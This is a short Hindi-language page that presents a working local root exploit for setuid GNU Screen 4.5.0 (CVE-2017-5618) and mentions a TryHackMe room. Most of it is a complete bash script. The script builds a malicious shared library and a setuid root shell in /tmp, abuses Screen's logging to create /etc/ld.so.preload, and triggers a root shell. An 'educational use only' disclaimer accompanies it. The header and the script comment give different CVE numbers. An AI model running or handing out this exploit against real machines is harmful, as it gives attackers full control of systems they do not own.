
GNU Screen 4.5.0 (CVE-2017-5618) के लिए स्थानीय विशेषाधिकार वृद्धि शोषण। लॉगिंग सुविधा में एक भेद्यता का फायदा उठाकर साझा लाइब्रेरी लोडिंग को हाईजैक करता है और ld.so.preload हेरफेर के माध्यम से रूट एक्सेस प्राप्त करता है। असुरक्षित: Screen 4.5.0 (SUID) इसमें ठीक किया गया: Screen 4.6.0+
GNU Screen 4.5.0 के लिए स्थानीय विशेषाधिकार वृद्धि शोषण जो साझा लाइब्रेरी लोडिंग को हाईजैक करके ld.so.preload हेरफेर के माध्यम से रूट एक्सेस प्राप्त करता है।
कमजोरी: CVE-2017-5618
प्रकार: ld.so.preload के माध्यम से साझा लाइब्रेरी हाईजैकिंग
प्रभावित: केवल GNU Screen 4.5.0
ठीक किया गया: GNU Screen 4.6.0+ में
CVE: 2017-5618 🎯
बग: Screen 4.5.0 लॉग फ़ाइलों को खतरनाक अनुमतियों के साथ बनाता है
जादू: हम इसे /etc/ld.so.preload बनाने के लिए धोखा देते हैं जो हमारी दुर्भावनापूर्ण लाइब्रेरी लोड करता है
पेलोड: तुरंत रूट शेल! 🐚
#!/bin/bash
# exploit.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# CVE-2016-8781
# tested on debian jessie (8.6) with screen 4.5.
# 0xHackers - Darke
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
echo "[+] Triggering..."
screen -ls
/tmp/rootshell
कमजोर Screen संस्करण की जाँच।

फ़ाइल बनाना और आवश्यक अनुमतियाँ देना।

रूट एक्सेस प्राप्त हुआ।

रूट शेल प्राप्त - पूर्ण सिस्टम नियंत्रण
केवल शैक्षिक उपयोग के लिए! ⚠️ स्क्रिप्ट किडी मत बनो - इसका उपयोग केवल उन सिस्टम पर करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति है।
TryHackMe KOTH Room - Food